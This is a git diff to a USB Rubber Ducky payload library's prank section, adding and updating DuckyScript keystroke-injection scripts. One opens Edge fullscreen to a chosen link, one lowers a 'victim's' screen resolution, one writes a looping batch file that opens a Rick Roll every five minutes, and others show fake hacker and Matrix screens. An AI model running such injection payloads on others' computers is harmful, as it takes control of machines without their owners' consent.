@@ -3,10 +3,10 @@ REM Title: Hacker Typer
 REM Author:	UberGuidoZ
 REM Description: Opens a harmless website and types like a hacker
 REM Target:	Windows but easily modified to work on any OS with a browser
-REM Version:	1.0
+REM Version:	1.1
 REM Category:	Prank
 REM Source: https://github.com/UberGuidoZ/OMG-Payloads
-REM
+ATTACKMODE HID STORAGE
 DELAY 1500
 GUI r
 DELAY 1000

payloads/library/prank/Open a link of your wish/payload .txt

@@ -0,0 +1,19 @@
+REM Title: Open a Site in Edge of your wish
+	REM Author: Logikconfirmed
+	REM Descriptionhttps://payloadstudio.com/pro/src/hak5/assets/payloadstudiopro_large.svg: Opens edge enters automatically the defined link and goes into fullscreen
+	REM Target: Windows 10
+	REM Version: 1.0
+	REM Category: General / Prank
+
+REM Enter the sitelink down below
+DEFINE #link https://example.com
+DELAY 500
+GUI r
+DELAY 800
+STRINGLN %windir%\system32\cmd.exe /c "start microsoft-edge:"
+F11
+DELAY 800
+STRINGLN link
+ENTER
+F11
+

payloads/library/prank/Open a link of your wish/readme.md

@@ -0,0 +1,18 @@
+Title: Open a Site in Edge of your Wish
+Author: Logikconfirmed
+Description: Opens Microsoft Edge, automatically enters the defined link, and goes into fullscreen mode.
+Target: Windows 10
+Version: 1.0
+Category: General / Prank
+
+Instructions:
+
+1. Copy the Duckyscript to a USB Rubber Ducky device.
+
+2. Insert the USB Rubber Ducky into a Windows 10 computer.
+
+3. Wait for the script to execute.
+
+The script will open Microsoft Edge, navigate to the specified link, and then enable fullscreen mode.
+
+Note: Make sure the specified link (example.com in this script) is correctly defined in the script by modifying the 'DEFINE' line before running the script.

payloads/library/prank/Resolution_Prank/README.md

@@ -0,0 +1,5 @@
+# Resolution Prank
+
+This payload will go into windows based systems and change the resolution of the victim to the lowest possible setting. When finished, the LED will flash red and green, and at that point if you hit CAPS it will reset the monitor to the highest resolution allowed.
+
+### Somewhat resource dependent, may not work on older computers

payloads/library/prank/Resolution_Prank/payload.txt

@@ -0,0 +1,103 @@
+REM TITLE Resolution Prank
+REM AUTHOR Mavisinator30001
+REM TARGET Any system running Windows 10/11
+REM DESCRIPTION Goes into Windows settings and change the screen resolution. When finished, toggle caps to change display back
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+IF $_OS != WINDOWS
+    STOP_PAYLOAD
+END_IF
+LED_G
+DELAY 500
+CTRL GUI d
+DELAY 500
+GUI i
+DELAY 2000
+STRINGLN display
+DELAY 2500
+TAB
+ENTER
+DELAY 200
+REPEAT 8 TAB
+ENTER
+VAR $CAPS_STATE = $_CAPSLOCK_ON
+WHILE ($CAPS_STATE == $_CAPSLOCK_ON)
+HOLD DOWN
+DELAY 1000
+    RELEASE DOWN
+    ENTER
+    DELAY 200
+    LEFT
+    DELAY 200
+    ENTER
+
+    REM WHEN FINISHED WITH THE FIRST PART OF THE PAYLOAD DUCK WILL FLASH LED
+    VAR $LIGHT_UP_TIMES = 20
+    WHILE ($LIGHT_UP_TIMES > 0)
+        LED_G
+        DELAY 300
+        LED_OFF
+        DELAY 300
+        LED_R
+        DELAY 300
+        LED_OFF
+        DELAY 300
+        $LIGHT_UP_TIMES = $LIGHT_UP_TIMES - 1
+    END_WHILE
+    WAIT_FOR_CAPS_CHANGE
+END_WHILE
+DELAY 300
+REPEAT 12 TAB
+ENTER
+DELAY 200
+HOLD UP
+DELAY 1000
+RELEASE UP
+ENTER
+DELAY 200
+LEFT
+ENTER
+DELAY 1000
+ALT F4
+DELAY 200
+CTRL GUI F4

payloads/library/prank/Rick_Rolling_Forever/payload.txt

@@ -5,9 +5,10 @@ REM
 REM Description: Creates a batch file that opens a Rick Roll every 5 mins in default browser
 REM Notes: Creates batch file, starts batch file, minimizes the window
 REM Target:	Windows but fairly easily modified to work on any OS with a browser
-REM Version:	1.3
+REM Version:	1.5
 REM Category:	Prank
 REM Source: https://github.com/UberGuidoZ/OMG-Payloads
+ATTACKMODE HID STORAGE
 DELAY 2000
 GUI r
 DELAY 500
@@ -20,6 +21,7 @@ DELAY 1000
 STRING copy con rr.bat
 ENTER
 STRING @ECHO OFF
+ENTER
 STRING PING 127.0.0.1 -n 5 > NUL
 ENTER
 STRING :LOOP
@@ -30,7 +32,7 @@ STRING PING 127.0.0.1 -n 300 > NUL
 ENTER
 STRING GOTO LOOP
 ENTER
-CTRL C
+CTRL c
 DELAY 1000
 STRING cls && rr.bat
 ENTER

payloads/library/prank/The_Matrix-Wake_Up/payload.txt

@@ -2,7 +2,8 @@ REM Title: The Matrix Wake Up
 REM Description: Recreates the Wake Up Neo terminal scene in The Matrix
 REM Author: UberGuidoZ
 REM Target: Windows (including Powershell 2.0 or above)
-
+REM Version: v1.1
+ATTACKMODE HID STORAGE
 DELAY 3000
 GUI r
 DELAY 750